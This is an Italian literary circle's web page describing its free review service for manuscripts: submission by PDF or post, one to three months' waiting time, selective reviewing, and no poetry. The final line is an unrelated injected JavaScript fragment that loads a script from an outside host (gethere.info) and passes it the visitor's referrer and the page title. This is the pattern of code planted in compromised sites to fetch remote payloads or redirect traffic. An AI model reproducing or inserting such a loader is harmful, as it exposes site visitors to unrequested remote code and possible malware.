Recensioni

Il Circolo letterario Bel-Ami mette a tua disposizione un servizio gratuito di analisi e recensione di racconti, romanzi e poesie. Inviaci le tue opere e riceverai in risposta una recensione tecnica che ti permetterà di considerare un punto di vista alternativo nella valutazione dei tuoi scritti.
Sarà effettuato un inquadramento generale del testo, ne sarà analizzata la trama (per evidenziarne difetti e potenzialità) nonché la sintassi e la grammatica.

Responsabile
Bruna Bianchina

Collaboratori

Modalità di invio

In che formato è possibile inviare i testi?
I testi possono essere inviati in formato pdf all’indirizzo recensioni@bellami.it oppure in formato cartaceo all’indirizzo

Circolo letterario Bel-Ami
c/o Enoteca letteraria
Via delle Quattro Fontane, 130
00184 Roma
Gruppo Recensioni

senza dimenticare di inserire nel plico i propri riferimenti di contatto.

Qual è il tempo medio d’attesa?
In considerazione della lunghezza dei testi e della disponibilità dei recensori, il tempo medio di attesa può oscillare da uno a tre mesi.

Tutti i testi inviati vengono recensiti?
No. Saranno recensiti solamente quei testi che a giudizio del Circolo si saranno distinti per l’originalità, lo stile o l’argomento trattato. L’autore sarà preventivamente avvisato via email e la nota critica sarà pubblicata su sito www.bellami.it e promossa sui canali del Circolo.

Posso inviare una raccolta di poesie?
Attualmente il gruppo Recensioni non valuta le poesie.

Maggiori informazioni
recensioni@bellami.it

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;